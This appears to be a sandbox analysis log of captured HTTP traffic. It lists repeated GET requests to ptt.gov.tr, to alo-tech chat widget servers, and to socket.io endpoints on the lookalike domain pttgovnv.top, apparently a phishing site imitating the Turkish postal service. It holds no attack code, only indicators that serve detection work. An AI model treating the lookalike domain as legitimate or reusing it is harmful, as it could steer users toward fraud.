Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liVXH&sid=M3Npq313xU4h1v3KBQUg HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liVXF&sid=M3Npq313xU4h1v3KBQUg HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liVkz&sid=M3Npq313xU4h1v3KBQUg HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liWNm HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liWNm HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liWY7&sid=xdKg7EXtPfKxJvHtBQUj HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=xdKg7EXtPfKxJvHtBQUj HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: CCcpBRM4IR2ELCW2cHQWKA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liWY3&sid=xdKg7EXtPfKxJvHtBQUj HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liWY7&sid=xdKg7EXtPfKxJvHtBQUj HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liWjb&sid=xdKg7EXtPfKxJvHtBQUj HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Kargo/AmbalajHizmetleri.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1249172285.1725229538; _ga_SFQ172Y7CH=GS1.1.1725229537.1.1.1725229563.0.0.0
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liXTC HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liY0A&sid=fJmUnpo66zoSBdWxBQUm HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=fJmUnpo66zoSBdWxBQUm HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: IZ4RIrzRlpsSDN6tSU1KEw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liXTC HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liYKC&sid=fJmUnpo66zoSBdWxBQUm HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liY09&sid=fJmUnpo66zoSBdWxBQUm HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liY0A&sid=fJmUnpo66zoSBdWxBQUm HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Banka/PttKartPttMatikUst.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1249172285.1725229538; _ga_SFQ172Y7CH=GS1.1.1725229537.1.1.1725229570.0.0.0
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liYKC&sid=fJmUnpo66zoSBdWxBQUm HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liYKN&sid=fJmUnpo66zoSBdWxBQUm HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liYg2&sid=fJmUnpo66zoSBdWxBQUm HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
